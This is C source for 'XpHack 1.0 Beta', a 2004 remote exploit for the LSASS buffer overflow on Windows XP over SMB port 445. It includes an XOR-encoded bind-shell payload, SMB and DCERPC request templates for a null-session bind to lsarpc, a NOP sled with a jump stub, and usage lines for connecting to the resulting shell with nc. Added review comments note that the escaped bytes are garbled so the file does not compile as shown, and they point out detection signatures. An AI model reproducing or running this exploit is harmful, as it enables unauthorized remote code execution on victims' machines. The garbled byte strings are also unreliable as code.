/*
--------XpHack 1.0 Beta--------

CODED BY: JOCANOR

This is a first exploit of a project called ASQ12.
ASQ12 is a collection of exploits coded by me; the
exploits in the collection are simple for anybody to use.

Some exploits of my project ASQ12 are still private,

***and some are based on other people's exploits*****

Use at your own risk; this code is only for educational purposes,
the author is not responsible.

This is an exploit coded to hack all Windows XP through the bug:

LSASS on port 445 TCP/IP, remote buffer overflow.

You can get a shell easily with this code, for example:

C:> xphack 198.0.0.1 4444

later open a new cmd and type:

C:> nc 192.0.0.1 4444

Happy Hacking!!!!!!!!!!!!

JOCANOR (c) 2004

*/
#include <windows.h>

#pragma comment(lib, "ws2_32")

/*
 * Static request templates and payload.
 *
 * NOTE(review): as transcribed on this page every "\x" escape has lost its
 * backslash, so these literals are the ASCII text "x00x00..." rather than the
 * intended bytes and the file does not build as shown.  The comments below
 * read the strings as the bytes they were evidently meant to encode.
 */

/*
 * Payload copied into strBuffer at +160 by main().  main() also writes the
 * caller-supplied port into offset 176 after XORing it with 0x9999; together
 * with the 0x99 bytes in the first 16 bytes (EB 10 5A 4A 33 C9 66 B9 7D 01
 * 80 34 0A 99 E2 FA) this looks like an XOR-0x99 self-decoding stub, but that
 * is inferred, not verified here.  main() measures it with strlen(), so it is
 * assumed to contain no 0x00 byte.
 */
unsigned char bindshell[] =
"xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A"
"x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6"
"x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D"
"xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58"
"x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0"
"x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41"
"xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B"
"x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D"
"xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA"
"x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10"
"x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF"
"xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8"
"xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79"
"xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C"
"x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59"
"x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD"
"xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC"
"xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5"
"xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6"
"xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0"
"xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED"
"x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";

/*
 * req1: 4-byte NetBIOS session header (length 0x85) followed by an SMB header
 * ("\xFFSMB", command 0x72 = SMB_COM_NEGOTIATE).  The body is the plain-text
 * dialect list: "PC NETWORK PROGRAM 1.0", "LANMAN1.0",
 * "Windows for Workgroups 3.1a", "LM1.2X002", "LANMAN2.1", "NT LM 0.12".
 */
char req1[] =
"x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F"
"x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02"
"x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F"
"x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70"
"x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30"
"x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54"
"x20x4Cx4Dx20x30x2Ex31x32x00";

/*
 * req2: SMB_COM_SESSION_SETUP_ANDX (0x73) carrying an NTLMSSP message of
 * type 1 (NEGOTIATE), followed by the UTF-16 native OS / LAN manager strings
 * "Windows 2000 2195" and "Windows 2000 5.0".
 */
char req2[] =
"x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00"
"x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E"
"x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00"
"x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00"
"x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00"
"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00"
"x2Ex00x30x00x00x00x00x00";


/*
 * req3: second SMB_COM_SESSION_SETUP_ANDX carrying NTLMSSP type 3
 * (AUTHENTICATE).  The user and domain length fields are zero, i.e. this is
 * a null/anonymous session rather than a credentialed logon (field offsets
 * read from the template, not validated).  Same OS strings as req2.
 */
char req3[] =
"x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00"
"x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E"
"x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46"
"x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40"
"x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40"
"x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48"
"x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF"
"x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00"
"x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00"
"x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00"
"x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00"
"x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";


/*
 * req4: SMB_COM_TREE_CONNECT_ANDX (0x75) template.  The UTF-16 path starting
 * at offset 48 spells "\\192.168.1.210\IPC$"; main() overwrites it with the
 * host given on the command line and patches the length bytes at offsets 3
 * and 45.  The final 9 bytes (the "?????" service field) are re-appended
 * after the new path.
 */
char req4[] =
"x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00"
"x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00"
"x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00"
"x49x00x50x00x43x00x24"
"x00x00x00x3Fx3Fx3Fx3Fx3Fx00";

/*
 * req5: SMB_COM_NT_CREATE_ANDX (0xA2) opening the named pipe "\lsarpc"
 * (UTF-16 at the end of the template).
 */
char req5[] =
"x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00"
"x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00"
"x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00"
"x72x00x70x00x63x00x00x00";

/*
 * req6: SMB_COM_TRANSACTION (0x25) on "\PIPE\" carrying a DCERPC bind
 * (bytes 05 00 0B 03: version 5.0, packet type 11 = bind).  The abstract
 * syntax GUID bytes 6A 28 19 39 0C B1 D0 11 9B A8 00 C0 4F D9 2E F5 read as
 * 3919286a-b10c-11d0-9ba8-00c04fd92ef5, which matches the LSASS dssetup
 * (DsRole) interface, and the transfer syntax 04 5D 88 8A EB 1C C9 11 9F E8
 * 08 00 2B 10 48 60 is the standard NDR syntax (both identifications to be
 * confirmed against an IDL reference).  The bind to this interface over the
 * lsarpc pipe from an anonymous session is the point a detector would key on.
 */
char req6[] =
"x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"
"x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00"
"x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00"
"x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11"
"x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A"
"xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";

/*
 * req7: SMB_COM_TRANSACTION header for the final, oversized request.  NetBIOS
 * length 0x0CF4; the DCERPC header (05 00 00 03) is a request with fragment
 * length 0x0CA0, call id 1, context 0 and opnum 9.  Only this header is
 * static; main() appends strBuffer and shit1 after it.
 */
char req7[] =
"x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02"
"x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00"
"xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00"
"xECx03x00x00x00x00x00x00xECx03x00x00";

/*
 * shit1: 144 bytes (9 rows of 16) appended by main() directly after the
 * 2000-byte strBuffer region.  Read as little-endian 32-bit words it is
 * mostly 0/1 pairs interleaved with 0x00401495 and 0x0040707C, i.e. values in
 * the range of an image loaded at 0x00400000 — presumably pointers the target
 * code walks; not verifiable from this file.
 */
char shit1[] =

"x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9";


/*
 * shit3: same layout as shit1 but built around 0x0040A89A.  It is never
 * referenced by main() — dead data, probably a variant for another build.
 */
char shit3[] =
"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00";

/* LEN only sizes the buf/sendbuf locals in main(), which are never used.
 * NOP is the single-byte x86 no-op (0x90) used as filler in strBuffer.
 * BUFSIZE is the size of the filler/payload region spliced in after req7. */
#define LEN 3500
#define NOP 0x90
#define BUFSIZE 2000

/*
 * Entry point.  argv[1] is the host to contact on TCP 445, argv[2] the port
 * the payload is meant to listen on.  The body is one linear SMB/DCERPC
 * exchange: Negotiate, two Session Setups (NTLMSSP, null session), Tree
 * Connect to IPC$, NT Create of \lsarpc, a DCERPC bind, then one oversized
 * Transaction carrying the 0x90-filled strBuffer.  Every recv() result is
 * discarded; nothing in the replies is ever parsed.
 *
 * Review notes (observations, not fixes):
 *  - As transcribed the file does not compile: "\x" escapes have lost their
 *    backslash, '' in the sin_zero memset is an empty character constant,
 *    and "\ipc$" uses the non-standard escape \i.
 *  - printf/sprintf/memcpy/strlen/atoi/exit are used without <stdio.h>,
 *    <string.h> or <stdlib.h>; it relies on <windows.h> pulling them in
 *    (confirm with the intended toolchain).
 *  - On the wire this is an anonymous IPC$ session, a bind on the lsarpc
 *    pipe, and a ~3.2 KB request whose body is mostly 0x31 and 0x90 bytes —
 *    a compact signature for network detection.
 *  - The socket is never closed and WSACleanup() is never called.
 */
int main(int argc, char *argv[])
{

int i;
char hostipc[40];            /* "\\host\ipc$"; 40 bytes, no bound on argv[1] */
char *target;
char hostipc2[40*2];         /* same path widened to 16-bit chars (byte, 0) */
unsigned short port;
unsigned long ip;            /* unused */
unsigned char *sc;
char buf[LEN+1];             /* unused */
char sendbuf[(LEN+1)*2];     /* unused */
char req4u[sizeof(req4)+20]; /* req4 with the UNC path replaced; +20 is the only slack for a longer host */
char screq[BUFSIZE+sizeof(req7)+1500+440]; /* req7 + strBuffer + shit1 + filler */
char recvbuf[1600];
char strasm[]="x66x81xECx1Cx07xFFxE4"; /* intended as 7 bytes 66 81 EC 1C 07 FF E4 (reads as sub sp,0x71c / jmp esp — verify); as transcribed it is 22 ASCII chars */
char strBuffer[BUFSIZE];     /* NOP filler + payload + stub, built below */
int len, sockfd;
short dport = 445;           /* SMB over TCP */
struct hostent *he;
struct sockaddr_in their_addr;
char smblen;                 /* NetBIOS length byte for req4u; plain char, wraps past 127 */
char unclen;                 /* widened-path length field for req4u */
WSADATA wsa;

printf(" -----XpHack 1.0 beta----- ");
printf("-----ExPlOiT CoDeD By: JoCaNoR----- ");

/* Off by one: argv[2] is read below, so only argc < 3 would actually protect
 * the atoi() call; with one argument argv[2] is NULL. */
if (argc < 2)
{
printf("Usage: ");
printf("xphack <victim ip> <binshell port> ");
exit(0);
}


target = argv[1];
/* Unbounded sprintf into a 40-byte array: a host name longer than ~33
 * characters overflows this program's own stack.  "\ipc$" relies on the
 * non-standard escape \i. */
sprintf((char *)hostipc,"\\%s\ipc$", target);

/* Widen to 16-bit characters, each byte followed by 0.  All 40 bytes are
 * copied, including whatever sits after the terminator. */
for (i=0; i<40; i++)
{
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}

/* Rebuild the Tree Connect request around the new path: copy the template,
 * overwrite the path at offset 48, then re-append the 9-byte tail of req4
 * right after it.  Nothing checks the result against sizeof(req4u). */
memcpy(req4u, req4, sizeof(req4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);

/* Patch the NetBIOS session length (byte 3) and the path-length field
 * (byte 45); both are single bytes computed in a signed char. */
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);

unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);

/* The listen port is stored in the payload at offset 176, XORed with 0x9999
 * (consistent with the 0x99 bytes in the payload's decoder prologue; not
 * verified here).  atoi(argv[2]) is unchecked: non-numeric input yields 0. */
port = htons(atoi(argv[2]))^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
sc = bindshell;

/* Assemble the 2000-byte region: 0x90 filler, payload at +160 (strlen on the
 * payload assumes it has no 0x00 byte), the 7-byte stub at +1980 and a
 * 4-byte value at +1964.  The cast through long* is an unaligned, aliasing
 * store — undefined behaviour in standard C, tolerated by x86 MSVC. */
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, sc, strlen(sc));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=0x01004600;

/* Pre-fill the outgoing buffer with '1' (0x31); the trailing 440 bytes of
 * screq are never initialised but also never sent. */
memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);

/* Return value of WSAStartup() is ignored. */
WSAStartup(MAKEWORD(2,0),&wsa);

if ((he=gethostbyname(argv[1])) == NULL)
{
perror("Unable to resolve"); /* Winsock does not set errno; perror prints a misleading reason */
exit(1);
}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket error");
exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(dport);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
/* '' is an empty character constant and does not compile; the transcription
 * presumably lost a '\0'. */
memset(&(their_addr.sin_zero), '', 8);

printf("Connecting...");
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf(" Error, cna't connect to victim machine");
exit(1);
}

printf("Good ");

/* From here on each fixed template is sent in order and the reply is read
 * into recvbuf and ignored: len is overwritten every time and never checked
 * for 0 (peer closed) or SOCKET_ERROR, so a reset mid-exchange goes unnoticed
 * until the next send() fails. */

/* req1: SMB_COM_NEGOTIATE with the dialect list. */
if (send(sockfd, req1, sizeof(req1)-1, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);

/* req2: SESSION_SETUP_ANDX carrying NTLMSSP NEGOTIATE. */
if (send(sockfd, req2, sizeof(req2)-1, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);

/* req3: SESSION_SETUP_ANDX carrying NTLMSSP AUTHENTICATE with empty user and
 * domain — the null session. */
if (send(sockfd, req3, sizeof(req3)-1, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);

printf("Getting a shell...");
/* req4u: TREE_CONNECT_ANDX to \\host\ipc$.  Length is the patched NetBIOS
 * byte plus the 4-byte NetBIOS header; a negative smblen (long host name)
 * would make this length wrong. */
if (send(sockfd, req4u, smblen+4, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);


/* req5: NT_CREATE_ANDX opening \lsarpc. */
if (send(sockfd, req5, sizeof(req5)-1, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);


/* req6: TRANSACTION on \PIPE\ carrying the DCERPC bind. */
if (send(sockfd, req6, sizeof(req6)-1, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);


/* Final request: req7 header, then the 2000-byte strBuffer, then 144 bytes
 * of shit1; everything after that up to the send length is the 0x31 filler
 * from the memset above. */
memcpy(screq, req7, sizeof(req7)-1);
memcpy(screq+sizeof(req7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(req7)-1+BUFSIZE, shit1, 9*16);

/* Force the last byte of the sent region to 0, then send
 * BUFSIZE + sizeof(req7) - 1 + 1196 bytes.  send() is not looped, so a
 * short send of this ~3.2 KB buffer is not handled. */
screq[BUFSIZE+sizeof(req7)-1+1500-304-1] = 0;
if (send(sockfd, screq, BUFSIZE+sizeof(req7)-1+1500-304, 0)== -1)
{
printf("Error ");
exit(1);
}

printf("OoOoOps shell!! ");

/* Final reply is read and ignored like the others; success is never
 * actually verified.  Socket left open, no WSACleanup(). */
len = recv(sockfd, recvbuf, 1600, 0);

return 0;
}

/* CODED BY JOCANOR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!*/